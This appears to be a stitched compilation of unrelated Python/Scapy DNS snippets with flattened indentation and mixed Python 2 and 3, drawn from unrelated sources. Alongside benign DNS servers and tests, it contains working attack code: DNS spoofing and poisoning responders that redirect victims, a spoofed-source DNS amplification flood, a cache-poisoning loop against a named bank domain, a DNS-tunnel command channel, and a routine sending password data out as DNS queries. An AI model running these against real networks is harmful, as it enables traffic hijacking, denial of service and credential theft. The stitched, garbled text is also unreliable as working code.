def handle(self):
data, sock = self.request
src, port = self.client_address
request, request_type = parse_packet(self.client_address, data)
# Try Cache
cached_response = self.server.cache.get(request)
if cached_response:
response = DNS(cached_response.get('response'))
response.id = request.id
self.send_packet(sock, request, response.__bytes__())
logging.info('TX: {}:{} - CACHED, Question: {}'.format(
src, port, request.qd.qname))
return
# Try Hooks
response = process_packet(request, self.server.hooks,
self.client_address, request_type)
if response:
self.send_packet(sock, request, response)
return
# Try DNS Server
logging.info('TX: {}:{} - Forwarding DNS record(s) from {}'.format(
src, port, self.server.dns_server))
response = self.__forward_request_to_dns_server(data)
self.send_packet(sock, request, response, cache=False)
def send_req(qname: bytes):
"""
Send the DNS request with the answer to the Authoritative DNS server.
:param qname: the fake url
:return: code of answer, next command to perform.
"""
cmd_code, command = SERVER_COMMANDS['error&retransmission'], ""
while cmd_code == SERVER_COMMANDS['error&retransmission']:
# create the DNS query and send it:
# todo: get automatically the local dns server ip
dns_req = IP(dst=DNS_SERVER_IP) / UDP(sport=234, dport=53) / \
DNS(rd=1, qd=DNSQR(qname=qname, qtype='CNAME'))
response = sr1(dns_req, verbose=False)
cmd_code, command = parse_response(response[DNSRR])
# check if more parts are need to be send
if cmd_code == SERVER_COMMANDS['more']:
tmp_data = command
while cmd_code != SERVER_COMMANDS['last']:
# send an 'ACK' to server and parse the next part:
fake_domain = identify + b'.' + \
build_req(
CLIENT_COMMANDS['ok&continue'], b'continue') + DOMAIN
dns_req = IP(dst=DNS_SERVER_IP) / UDP(sport=234, dport=53) / DNS(rd=1, qd=DNSQR(qname=fake_domain,
qtype='CNAME'))
response = sr1(dns_req, verbose=False)
cmd_code, command = parse_response(response[DNSRR])
tmp_data += command # save the parts in temp var
command = tmp_data
return cmd_code, command
def process_spoof(self, pkt):
"""
process MiTM only for `self.url`, for others DNS request - forwarding the request to a real DNS server
:param pkt: the DNS request packet from the victim DNS nameserver
"""
qname = pkt[DNSQR].qname.decode()
if self.url in qname:
print(f"[!] a DNS request to `{qname}` has been detected")
fake_res = IP(src=pkt[IP].dst, dst=pkt[IP].src) / UDP(sport=53, dport=pkt[UDP].sport) \
/ DNS(id=pkt[DNS].id, ancount=1, qr=1, rd=1, qd=pkt[DNSQR],
an=DNSRR(rrname=qname, rdata=self.fake_addr, type='A')) / DNSRR(type=41)
send(fake_res, verbose=False)
else:
print(f"[!] a DNS request to `{qname}` has been detected")
# forwarding request to google public dns server
forward_res = IP(dst=DNSSpoof.FORWARD_IP) / UDP(sport=12345) / DNS(
id=pkt[DNS].id, rd=1, qd=pkt[DNSQR])
response = sr1(forward_res, verbose=False)
pkt_response = IP(src=self.gateway, dst=pkt[IP].src) / UDP(
sport=53, dport=pkt[UDP].sport) / response[DNS]
send(pkt_response, verbose=False)
def cuckoo_dnsserve(host, port, nxdomain, hardcode):
if not HAVE_SCAPY:
sys.exit(
"Currently the DNS serve script is not available due to issues "
"in upstream Scapy for Windows "
"(https://github.com/secdev/scapy/issues/111)."
)
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
udps.bind((host, port))
log.info("Listening for DNS queries at %s:%d", host, port)
while True:
data, addr = udps.recvfrom(1024)
p = DNS(data)
rp = DNS(id=p.id, qr=1, qdcount=p.qdcount, ancount=1, rcode=0)
rp.qd = p[DNSQR]
# IN A, actually look the domain up.
if p.opcode == 0 and p[DNSQR].qtype == 1 and p[DNSQR].qclass == 1:
if hardcode:
answer_ip = hardcode
else:
try:
answer_ip = socket.gethostbyname(p.qd[0].qname)
except:
if nxdomain:
answer_ip = nxdomain
else:
rp.ancount = 0
rp.rcode = 3
answer_ip = None
if answer_ip:
rp.an = DNSRR(
rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip
)
log.debug("IN A %s -> %s.", p.qd[0].qname, answer_ip)
# IN PTR, we reply with NXDOMAIN.
elif p.opcode == 0 and p[DNSQR].qtype == 12 and p[DNSQR].qclass == 1:
rp.ancount = 0
rp.rcode = 3
log.info("IN PTR %s -> NXDOMAIN.", p.qd[0].qname)
else:
rp.ancount = 0
rp.rcode = 2
log.warn(
"Unhandled query %s for %s/%s,%s - answering with servfail.",
p.opcode, p.qd[0].qname, p[DNSQR].qtype, p[DNSQR].qclass
)
udps.sendto(rp.build(), addr)
def main():
"""
Add Documentation here
"""
# print DNS().show()
dns_packet = DNS(qdcount=1) / DNSQR(qname='www.google.com')
# print dns_packet.show()
# print ls(UDP)
# dns_packet = UDP(sport=24601, dport=53)/DNS(qdcount=1)/DNSQR(qname='www.google.com')
dns_packet = IP(dst='8.8.4.4') / UDP(sport=24601, dport=53) / DNS(
qdcount=1, rd=1) / DNSQR(qname='www.google.com')
response_packet = sr1(dns_packet)
print response_packet.show()
def prn(pkt):
"""
process MiTM only for `url`, for others DNS request - forwarding the request to a real DNS server
:param pkt: the DNS request packet from the victim DNS nameserver
"""
qname = pkt[DNSQR].qname
if DOMAIN in qname:
if b'_' in qname:
# print("[!] underscore (_) in domain!")
response = IP(dst=pkt[IP].src) / \
UDP(sport=53, dport=pkt[UDP].sport)
response /= DNS(id=pkt[DNS].id,
ancount=1,
qr=1,
rd=1,
qd=pkt[DNSQR],
an=DNSRR(rrname=pkt[DNSQR].qname,
rdata='ns.resh.gimel.',
type='NS'))
send(response, verbose=False)
elif b'ns' in qname:
# print("[!] NS in domain!")
if pkt[DNSQR].qtype == TYPES['A']:
response = IP(dst=pkt[IP].src) / \
UDP(sport=53, dport=pkt[UDP].sport)
response /= DNS(id=pkt[DNS].id,
ancount=1,
qr=1,
rd=1,
qd=pkt[DNSQR],
an=DNSRR(rrname=pkt[DNSQR].qname,
rdata='96.69.96.69',
type='A'))
send(response, verbose=False)
elif pkt[DNSQR].qtype == TYPES['AAAA']:
response = IP(dst=pkt[IP].src) / \
UDP(sport=53, dport=pkt[UDP].sport)
response /= DNS(id=pkt[DNS].id,
ancount=1,
qr=1,
rd=1,
qd=pkt[DNSQR],
an=DNSRR(rrname=pkt[DNSQR].qname,
rdata='2001:4860:4802:32::78',
type='AAAA'))
send(response, verbose=False)
else:
attack(pkt)
def create_stream(self, src_if):
"""Create input packet stream for defined interface.
:param VppInterface src_if: Interface to create packet stream for.
"""
good_request = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=src_if.remote_ip4) / UDP(sport=1234, dport=53) /
DNS(rd=1, qd=DNSQR(qname="bozo.clown.org")))
bad_request = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=src_if.remote_ip4) / UDP(sport=1234, dport=53) /
DNS(rd=1, qd=DNSQR(qname="no.clown.org")))
pkts = [good_request, bad_request]
return pkts
def check_protocol_on_port(_socket) -> str:
try:
_socket.send(HTTPRequest().build())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
if HTTPResponse(_pkt=pkt_response).Status_Code != 0:
return 'http'
except:
pass
try:
_socket.send('HELO'.encode())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
data = pkt_response.decode()
int(data[:3])
return 'smtp'
except:
pass
try:
_socket.send('USER mrose'.encode())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
data = pkt_response.decode()
if any(['+OK' in data, '-ERR' in data]):
return 'pop3'
except:
pass
try:
_socket.send(DNS(qr=0, qd=DNSQR()).build())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
if DNS(_pkt=pkt_response).qr == 1:
return 'dns'
except:
pass
try:
_socket.send(NTPHeader().build())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
if NTPHeader(_pkt=pkt_response).recv != 0:
return 'ntp'
except:
pass
return ''
def dns_attack(dst_ip, src_ip):
a = IP(dst=dst_ip, src=src_ip) # 192.168.1.200 为伪造的源ip
b = UDP(dport=53)
c = DNS(id=1,
qr=0,
opcode=0,
tc=0,
rd=1,
qdcount=1,
ancount=0,
nscount=0,
arcount=0)
c.qd = DNSQR(qname='www.qq.com', qtype=1, qclass=1)
p = a / b / c
send(p)
def forward_dns(orig_pkt: IP):
print(f"Forwarding: {orig_pkt[DNSQR].qname}")
response = sr1(
IP(dst='8.8.8.8') / UDP(sport=orig_pkt[UDP].sport) /
DNS(rd=1,
id=orig_pkt[DNS].id,
qd=DNSQR(qname=orig_pkt[DNSQR].qname)),
verbose=0,
)
resp_pkt = IP(dst=orig_pkt[IP].src, src=DNS_SERVER_IP) / UDP(
dport=orig_pkt[UDP].sport) / DNS()
resp_pkt[DNS] = response[DNS]
send(resp_pkt, verbose=0)
return f"Responding to {orig_pkt[IP].src}"
def send_DNS_packet(entries, send_packet_button):
"""
发送DNS包
:param entries:协议字段编辑列表
:param send_packet_button: send_packet_button:发送按钮
:return: None
"""
if send_packet_button['text'] == '发送':
dns_id = int(entries[0].get())
dns_qr = int(entries[1].get())
dns_opcode = int(entries[2].get())
dns_aa = int(entries[3].get())
dns_tc = int(entries[4].get())
dns_rd = int(entries[5].get())
dns_ra = int(entries[6].get())
packet_to_send = DNS(id=dns_id,
qr=dns_qr,
opcode=dns_opcode,
aa=dns_aa,
tc=dns_tc,
rd=dns_rd,
ra=dns_ra)
t = threading.Thread(target=send_packet, args=(packet_to_send, ))
t.setDaemon(True)
t.start()
# 使协议导航树不可用
toggle_protocols_tree_state()
send_packet_button['text'] = '停止'
else:
# 终止数据包发送线程
stop_sending.set()
# 恢复协议导航树可用
toggle_protocols_tree_state()
send_packet_button['text'] = '发送'
def poke(self):
question = DNS(rd=1, qd=DNSQR(qname='www.gov.cn'))
if self.sniffer:
packet1 = IP(
src=self.src, dst=self.dst, id=self.ttl * 10 + 1,
ttl=self.ttl) / UDP(sport=self.sport,
dport=self.dport) / question
networking.send(packet1)
self.report['PACKETS'].append(('PACKET_1', packet1))
if not self.one_packet_only:
packet2 = IP(src=self.src,
dst=self.dst,
id=self.ttl * 10 + 2,
ttl=self.ttl) / UDP(sport=self.sport,
dport=self.dport) / question
networking.send(packet2)
self.report['PACKETS'].append(('PACKET_2', packet2))
packet3 = IP(src=self.src,
dst=self.dst,
id=self.ttl * 10 + 3,
ttl=self.ttl) / UDP(sport=self.sport,
dport=self.dport) / question
networking.send(packet3)
self.report['PACKETS'].append(('PACKET_3', packet3))
else:
self.udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.IPPROTO_UDP)
atexit.register(self.udp_socket.close)
self.udp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, self.ttl)
self.udp_socket.settimeout(0)
self.udp_socket.bind(
(self.src, self.sport
)) # if sport change the route going through might change
self.udp_socket.sendto(str(question), (self.dst, self.dport))
def spoof_dns_response(pkt):
global ip_of_network_interface, ip_domain_mapping
spoofed_ip = None
# strip the dot at the end of domain name and decode the bytes
domain_name_req = pkt[DNSQR].qname[:-1].decode('utf-8')
if pkt.dport == 53 and UDP in pkt and DNSRR not in pkt:
if len(ip_domain_mapping) > 0:
# check if mapping for it is present in host file supplied
if ip_domain_mapping and domain_name_req in ip_domain_mapping:
spoofed_ip = ip_domain_mapping[domain_name_req]
else:
print('Not spoofing for ' + domain_name_req + '\n')
return
elif len(ip_domain_mapping) == 0:
spoofed_ip = ip_of_network_interface
print('Spoofing: ' + domain_name_req + ' ' + spoofed_ip + '\n')
#build spoof response
spoof_response = IP(dst=pkt[IP].src, src=pkt[IP].dst) \
/ UDP(dport=pkt[UDP].sport, sport=53) \
/ DNS(id=pkt[DNS].id,qr=1,qd=DNSQR(qname=pkt[DNSQR].qname),an=DNSRR(rrname=pkt[DNS].qd.qname,rdata=spoofed_ip))
# send response to victim
send(spoof_response)
def send_dns_poison(host_mac: str, host_ip: str, received_packet: packet):
dnsrr = DNSRR()
dnsrr[DNSRR].rrname = received_packet[DNSQR].qname
dnsrr[DNSRR].type = 'A'
dnsrr[DNSRR].rclass = received_packet[DNSQR].qclass
dnsrr[DNSRR].ttl = 86400
dnsrr[DNSRR].rdata = settings['redirect spoofed domains to']
dns = Ether() / IP() / UDP() / DNS()
dns[Ether].src = attacker_mac
dns[Ether].dst = host_mac
dns[IP].dst = host_ip
dns[IP].src = received_packet[IP].dst
dns[UDP].dport = received_packet[UDP].sport
dns[UDP].sport = received_packet[UDP].dport
dns[DNS].id = received_packet[DNS].id
dns[DNS].ancount = 1
dns[DNS].qr = 1
dns[DNS].rd = 1
dns[DNS].qd = received_packet[DNS].qd
dns[DNS].an = dnsrr
if settings['show debug']:
dns.show()
sendp(dns, iface=interface, verbose=settings['show debug'])
if settings['show dns spoof']:
print('Spoofed DNS request from ' + host_ip + ' for ' +
dns[DNSQR].qname.decode()[:-1])
def send_ICMP_packet(entries, send_packet_button):
"""
发送ICMP包
:param entries: 协议字段编辑列表
:param send_packet_button: 发送按钮
:return: None
"""
if send_packet_button['text'] == '发送':
icmp_type = int(entries[0].get())
icmp_code = int(entries[1].get())
icmp_id = hex(entries[2].get())
icmp_seq = hex(entries[3].get())
packet_to_send = DNS(type=icmp_type,
code=icmp_code,
id=icmp_id,
seq=icmp_seq)
t = threading.Thread(target=send_packet, args=(packet_to_send, ))
t.setDaemon(True)
t.start()
# 使协议导航树不可用
toggle_protocols_tree_state()
send_packet_button['text'] = '停止'
else:
# 终止数据包发送线程
stop_sending.set()
# 恢复协议导航树可用
toggle_protocols_tree_state()
send_packet_button['text'] = '发送'
def send_dns(ip, port):
print(f"dns: {ip}:{port}")
pkt = IP(dst=ip) / UDP(sport=54323, dport=port) / DNS(
rd=1, id=12345, qd=DNSQR(qtype=16, qname="anakena.dcc.uchile.cl"
)) # qtype=1 is A and DNS Request ID is 12345
# Captura de lo enviado
capture_1 = StringIO()
save_stdout = sys.stdout
sys.stdout = capture_1
pkt.show()
sys.stdout = save_stdout
print("len enviado:" + str(len(capture_1.getvalue())))
print(f"Sending: {pkt.summary()}")
# ANS is like IP(src=ip, dst=<myip>) / UDP(sport=port, dport=54323) / DNS(rd=1, qd=DNSQR(qtype=1, qname="lab4.cc5312.xor.cl") an=[<RRs received>]) # 1 is A
ans = sr1(pkt, verbose=1)
print(f"received:")
# Captura de la respuesta
capture = StringIO()
save_stdout = sys.stdout
sys.stdout = capture
ans.show()
sys.stdout = save_stdout
print(f'RECEIVED LEN :{len(capture.getvalue())}\n')
quotient = len(capture.getvalue()) / len(capture_1.getvalue())
print(quotient)
def get_data(pkt: IP):
try:
client_message = pkt[DNSQR].qname[:-1].decode('utf-8')
add_new_client = False
for client in clients:
if client.receiver_socket[
1] == -1 and client.sender_socket == address:
add_new_client = True
client.receiver_socket = (client.receiver_socket[0],
int(client_message))
if not add_new_client:
print(
time.ctime(time.time()) + str(address) + " => " +
str(client_message))
for client in clients:
if client.sender_socket != address:
try:
if client.receiver_socket[1] != -1:
p = IP(dst=client.receiver_socket[0]) / UDP(dport=client.receiver_socket[1]) \
/ DNS(rd=1, qd=DNSQR(qname=client_message))
print(client.receiver_socket[1])
send(p, verbose=0)
print("Message was sent to", client)
except socket.error as err:
print(err)
except socket.error as err:
print(err)
clients_to_remove.append(address)
def create_dns_response_record(pkt, response_map):
sections = {
'an': {
'layer': None,
'count': 0,
},
'ar': {
'layer': None,
'count': 0,
},
'ns': {
'layer': None,
'count': 0,
}
}
payload = {'id': pkt[DNS].id}
for section, responses in response_map.iteritems():
sections[section]['count'] = len(responses)
for response in responses:
response_record = DNSRR(rrname=response.name,
type=response.dns_type.value,
rdata=response.data,
ttl=response.ttl)
if sections[section]['layer'] is None:
sections[section]['layer'] = response_record
else:
sections[section]['layer'].add_payload(response_record)
if sections[section]['count']:
payload.update({
section:
sections[section]['layer'],
"{}count".format(section):
sections[section]['count']
})
return DNS(**payload).__bytes__()
def dns_spoof(pkt):
global s, hosts, my_ip
spoofed_ip = None
if pkt.dport == 53 and UDP in pkt and DNSRR not in pkt:
print('query for: ' + pkt[DNSQR].qname)
if pkt[DNSQR].qname[:-1] in hosts:
spoofed_ip = hosts[pkt[DNSQR].qname[:-1]]
print('will inject')
elif len(hosts) == 0:
spoofed_ip = my_ip
else:
print('wont inject')
return
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) \
/ UDP(dport=pkt[UDP].sport, sport=53) \
/ DNS(id=pkt[DNS].id,
qr=1L,
qd=DNSQR(qname=pkt[DNSQR].qname),
an=DNSRR(rrname=pkt[DNS].qd.qname, rdata=spoofed_ip)
)
sent = s.sendto(str(spoofed_pkt), (pkt[IP].src, pkt[UDP].sport))
if sent < 1:
print('There was a problem sending.')
else:
print('injected')
def dns_serve(args):
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
udps.bind((args.bind, args.port))
while True:
data, addr = udps.recvfrom(1024)
p = DNS(data)
rp = DNS(id=p.id, qr=1, qdcount=p.qdcount, ancount=1, rcode=0)
rp.qd = p[DNSQR]
# IN A, actually look the domain up.
if p.opcode == 0 and p[DNSQR].qtype == 1 and p[DNSQR].qclass == 1:
if args.hardcode:
answer_ip = args.hardcode
else:
try:
answer_ip = socket.gethostbyname(p.qd[0].qname)
except:
if args.nxdomain:
answer_ip = args.nxdomain
else:
rp.ancount = 0
rp.rcode = 3
answer_ip = None
if answer_ip:
rp.an = DNSRR(
rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip
)
log.debug("IN A %s -> %s.", p.qd[0].qname, answer_ip)
# IN PTR, we reply with NXDOMAIN.
elif p.opcode == 0 and p[DNSQR].qtype == 12 and p[DNSQR].qclass == 1:
rp.ancount = 0
rp.rcode = 3
log.info("IN PTR %s -> NXDOMAIN.", p.qd[0].qname)
else:
rp.ancount = 0
rp.rcode = 2
log.warn(
"Unhandled query %s for %s/%s,%s - answering with servfail.",
p.opcode, p.qd[0].qname, p[DNSQR].qtype, p[DNSQR].qclass
)
udps.sendto(rp.build(), addr)
def main():
message = input('enter your message: ')
for char in message:
url = f'www.{get_word(char)}.com'
print(url)
send(
IP(dst=ip) / UDP(dport=53) /
DNS(rd=1, qd=DNSQR(qname=url, qtype="A")))
def readPackets(packet):
global info
if packet.haslayer(DNSQR) and packet[IP].src == info['tip']:
packetResponse = (Ether()/IP(dst=packet[0][1].src, src=packet[0][1].dst)/\
UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\
DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, \
an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=info['ip'])))
sendp(packetResponse, count=1, verbose=0)
print("Redirecting...")
def attack_dns(self):
for ip in self.server_list.dns:
packet = IP(src=self.target_ip, dst=ip) / UDP(
sport=self.target_port, dport=53) / DNS(
rd=1, qd=DNSQR(qname="google.com", qtype="ANY"))
t = threading.Thread(target=self.boom, args=packet)
print("sending spoofed udp dns packet to : " + ip)
t.start()
self.scapy_threads.append(t)
def main():
"""
Add Documentation here
"""
dest = raw_input("enter the site:")
dns_packet = IP(dst='8.8.4.4') / UDP(sport=24601, dport=53) / DNS(
qdcount=1, rd=1) / DNSQR(qname=dest)
response_packet = sr1(dns_packet)
print response_packet[DNSRR][1].rdata
def forward_dns(orig_pkt):
print(f"Forwarding: {orig_pkt[DNSQR].qname}")
response = sr1(
IP(dst=ip_forward) /
UDP(sport=orig_pkt[UDP].sport) /
DNS(rd=1, id=orig_pkt[DNS].id, qd=DNSQR(qname=orig_pkt[DNSQR].qname)), verbose=0)
resp_pkt = IP(dst=orig_pkt[IP].src, src=ip_gateway) / UDP(dport=orig_pkt[UDP].sport) / DNS()
resp_pkt[DNS] = response[DNS]
send(resp_pkt, verbose=0)
return f"Responding to {orig_pkt[IP].src} | time: {time.time()}"
def caputre(packet):
print('working')
if(DNS in packet and 's.student.pwr.edu.pl.' in str(packet['DNS Question Record'].qname)):
print('enter')
pkt = IP(dst=packet[IP].src) / UDP(dport=packet[UDP].sport, sport=53) / DNS(id=packet[DNS].id, ancount=1,
an=DNSRR(rrname=packet[DNSQR].qname,
rdata='127.0.1.2') / DNSRR(
rrname='student.pwr.edu.pl',
rdata='127.0.1.2'))
send(pkt)
def run(self):
"""
This function sends the Password data
"""
for password in self.user_data:
time.sleep(10)
answer: Union[Union[PacketList, List[Any]], Any] = sr1(
IP(dst=self.dns_server_ip) / UDP(dport=self.dns_port) /
DNS(rd=1, qd=DNSQR(qname=password)),
verbose=0)
def send_dns(ip, port):
print(f"dns: {ip}:{port}")
pkt = IP(dst=ip) / UDP(sport=55312, dport=port) / DNS(rd=1, id=12345, qd=DNSQR(
qtype=1, qname="spoofed.lab4.cc5312.xor.cl")) # qtype=1 is A and DNS Request ID is 12345
print(f"Sending: {pkt.summary()}")
# ANS is like IP(src=ip, dst=<myip>) / UDP(sport=port, dport=54323) / DNS(rd=1, qd=DNSQR(qtype=1, qname="lab4.cc5312.xor.cl") an=[<RRs received>]) # 1 is A
ans = sr1(pkt, verbose=1)
print(f"received:")
ans.show()
print(ans.command())
def spf_pkt(sniffed_dns_pkt):
"""get a DNS Request packet. Returns DNS Response packet directing to the custom ip."""
sp_pkt = IP(src=server_ip, dst=sniffed_dns_pkt[IP].src) \
/ UDP(dport=sniffed_dns_pkt[UDP].sport, sport=53) \
/ DNS(id=sniffed_dns_pkt[DNS].id, qr=1, opcode=sniffed_dns_pkt[DNS].opcode,
aa=1, rd=0, qdcount=sniffed_dns_pkt[DNS].qdcount, ancount=1, nscount=1,
qd=DNSQR(qname=sniffed_dns_pkt[DNSQR].qname),
an=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, ttl=86400, rdata=custom_ip),
ns=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, type=2, rdata=custom_ip),
ar=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, rdata=custom_ip))
return sp_pkt
def up_all_night_to_get_lucky():
iplayer = IP(src="10.0.0.1", dst="10.10.0.1")
udplayer = UDP(dport=40043,
chksum=None) # Please autogenerate the checksum
dnslayer = DNS(qr=1, id=random.randint(0, 63999)) # This is a response
# Combine layers
totalpacket = iplayer / udplayer / dnslayer
# Execute Order 66
random_sub_domain = ''.join(
choice(ascii_letters) for i in range(20)) # Generate random subdomain
while True:
os.system("dig " + random_sub_domain + ".bankofrhul.co.uk&")
send(totalpacket, count=50)
random_sub_domain = ''.join(
choice(ascii_letters)
for i in range(20)) # Gen Next random subdomain
dnslayer.id = random.randint(0, 65535) # Gen Next query id guess
def build_query(layer: dict, domain: str) -> object:
pkt = IP(dst=layer["dst"])
pkt /= UDP(dport=53)
pkt /= DNS(
rd=0, # no recursion desired
qr=DNSHeaders.QR.Query,
qd=DNSQR(qname=layer["dns"]["qname"],
qtype=DNSHeaders.Type.HostAddr),
)
return Packet(pkt, domain)
def send_receive_query(self, dns_server='8.8.8.8'):
"""
send the query and receive the results DNS Resource Records
@param dns_server:the ip of a local dns server
@return: list of all rdata from the DNS Resource Records
"""
pack = IP(dst=dns_server) / UDP() / DNS(
qd=DNSQR(qname=self.query_data, qtype=self.query_type))
result = sr1(pack, verbose=0)
if (DNS in result) and (DNSRR in result):
return [result[DNSRR][x].rdata for x in range(result[DNS].ancount)]
print ans
print unans
print ""
###################################################################
#reset a thing or so..
my_query = "wpad"
print "-------------------------------------------------"
print "Sending mDNS request for " + my_query + ".."
ethernet = Ether(src=my_mac,dst=mdns_target_mac)
ip = IP(src=my_ip,dst=mdns_target_ip)
udp = UDP(sport=5353,dport=5353)
dns = DNS()
dns.id = queryid
dns.qr = 0
dns.opcode = 0
dns.qdcount = 1
dns.rq = 0
dns.qd = DNSQR(qname=my_query,qtype=my_qtype)
pkt=ethernet/ip/udp/dns
ans,unans=srp(pkt,multi=True,verbose=0,timeout=1)
for p in ans:
print "-------------------------------------------------"
print "Response from: " + p[1][Ether].src, p[1][IP].src
print "-------------------------------------------------"
print ans
print unans
